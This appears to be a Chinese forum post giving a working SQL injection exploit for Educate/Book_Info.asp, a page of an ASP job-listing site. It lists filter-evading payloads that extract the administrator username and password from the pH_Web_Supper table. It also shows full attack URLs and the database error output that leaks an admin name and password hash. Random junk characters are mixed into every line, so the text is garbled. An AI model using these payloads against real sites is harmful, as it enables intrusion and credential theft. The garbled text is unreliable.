漏洞出现在Educate/Book_Info.asp: ~9 x$ s( D, N4 I6 K- h H
此处注入点虽然过滤了一些关键字 但是我们还是可以盲注的 可以利用sqlmap跑出
3 P3 }9 C T. S+ F" fexp:如下
4 c8 x" ~+ I- n+ ]( N* b查询管理账号:+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)6 i3 K% f' G! i) e9 g
查询管理密码:+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)0 F4 e* B# L3 }; J* t- u; K* f
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_SupperName+frOm+pH_Web_Supper)! C/ F* r& G4 J1 W1 n- o# } r
Microsoft OLE DB Provider for SQL Server 错误 '80040e07'
S5 p+ f0 [" S& f2 e# L将 nvarchar 值 'hackbase' 转换为数据类型为 int 的列时发生语法错误。
1 Q% }5 L8 B" _ n" K) p& ~/Educate/Book_Info.asp,行 8$ F. U3 e- J8 u! n' O
http://jobs.0day5.com/Educate/Book_Info.asp?Param=20+aNd+0=(selEct+toP+1+su_Password+frOm+pH_Web_Supper)
" M0 n7 Q6 `' uMicrosoft OLE DB Provider for SQL Server 错误 '80040e07'
; u. g: g9 Z8 t将 nvarchar 值 '165706AD8319D7F95B7FC5E82FBE8F' 转换为数据类型为 int 的列时发生语法错误。
) S0 z, L6 |" ]# l/Educate/Book_Info.asp,行 8 |